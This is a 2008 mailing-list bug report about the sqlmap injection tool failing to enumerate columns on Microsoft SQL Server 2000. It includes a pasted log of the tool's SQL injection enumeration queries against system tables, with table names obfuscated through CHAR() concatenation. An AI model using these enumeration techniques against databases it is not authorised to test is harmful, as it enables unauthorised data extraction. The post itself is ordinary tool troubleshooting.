[sqlmap-users] Microsoft SQL 2000
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Microsoft SQL 2000
|
From: Jason S. <jas...@gm...> - 2008-11-25 06:20:22
|
Having a couple problems with Microsoft SQL 2000... Database enumeration seems OK Table enumeration seems OK Column enumeration doesn't work, returns a blank field, then returns the first field, and repeats it over and over, and returns a false amount of columns, like 25+ columns when only about 6 exist or so... System tested on: Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) [21:13:32] [INFO] fetching columns for table 'testtable' on database 'testdb' [21:13:32] [INFO] fetching number of columns for table 'testtable' on database 'testdb' [21:13:32] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114)) [21:13:32] [INFO] retrieved: 25 [21:13:53] [INFO] performed 20 queries in 21 seconds [21:13:53] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM (SELECT TOP 0 name FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114))) CTABLE [21:13:53] [INFO] retrieved: [21:13:56] [INFO] performed 6 queries in 2 seconds [21:13:56] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM (SELECT TOP 1 name FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114))) CTABLE [21:13:56] [INFO] retrieved: accountnumber [21:15:57] [INFO] performed 97 queries in 121 seconds [21:15:57] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM (SELECT TOP 2 name FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114))) CTABLE [21:15:57] [INFO] retrieved: accountnumber [21:18:22] [INFO] performed 97 queries in 144 seconds [21:18:22] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM (SELECT TOP 3 name FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114))) CTABLE [21:18:22] [INFO] retrieved: accountnumber [21:20:45] [INFO] performed 97 queries in 142 seconds [21:20:45] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM (SELECT TOP 4 name FROM testdb..syscolumns WHERE id=(SELECT id FROM testdb..sysobjects WHERE name=CHAR(99)+CHAR(117)+CHAR(115)+CHAR(116)+CHAR(111)+CHAR(109)+CHAR(101)+CHAR(114))) CTABLE |
